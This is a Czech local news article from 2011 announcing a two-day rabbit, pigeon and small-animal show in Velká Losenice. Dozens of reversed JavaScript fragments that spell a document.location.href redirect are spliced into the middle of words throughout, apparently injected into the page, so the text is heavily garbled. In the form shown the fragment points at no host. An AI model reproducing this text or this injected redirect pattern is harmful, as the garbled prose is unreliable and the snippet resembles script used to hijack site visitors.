Velká Losenice, velka losenice, aktuality, výstava
Rainbow page separator

Výstava představí králíky, holuby nebo i morčata a hady

Středa, 27. července 2011

Velká Losenice/ Dva dny bude trvat již sedmý ročník tradiční Podpeperské výstavy. Ta se uskuteční u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti pouti už ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to víkend, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v obci Velká Losenice na Žďársku. Akci pořádá Základní organizace Českého svazu chovatelů Velká Losenice.

V pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách budovy číslo popisné 106, která se nachází v blízkosti velkolosenického kostela, si bude možné prohlédnout několik s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek nejrůznějších druhů zvířat. Chybět by tam nemělo více jak tři sta králíků, téměř dvě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky holubů a zhruba s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to padesát zástupců drůbeže. Velkým lákadlem budou také morčata, kterých by mělo být dovezeno kolem s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky. Lidé, kteří se na expozici dostaví, si ale budu moci prohlédnout i méně běžné druhy živočichů. Vystaveni [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž budou také papoušci nebo hadi. V areálu se navíc bude nacházet páv nebo poník a koně.

Především dětští návštěvníci akce se mohou těšit na oblíbenou disciplínu nazývanou Králičí hop. Při ní králíci, obvykle ti zakrslí, překonávají připravené překážky. Doprovodný program nabídne také boha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tombolu, možnost diskuze s pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnými chovateli nebo občerstvení. Podpeperská výstava bude pro veřejnost otevřena v sobotu v poledne a potrvá až do šesti hodin večer. V neděli sem mohou zájemci zavítat již od osmé hodiny ranní a setrvat do sedmnácti hodin. Zatímco dospělí návštěvníci za vstupné zaplatí třicet korun, děti mají na výstavu vstup zdarma.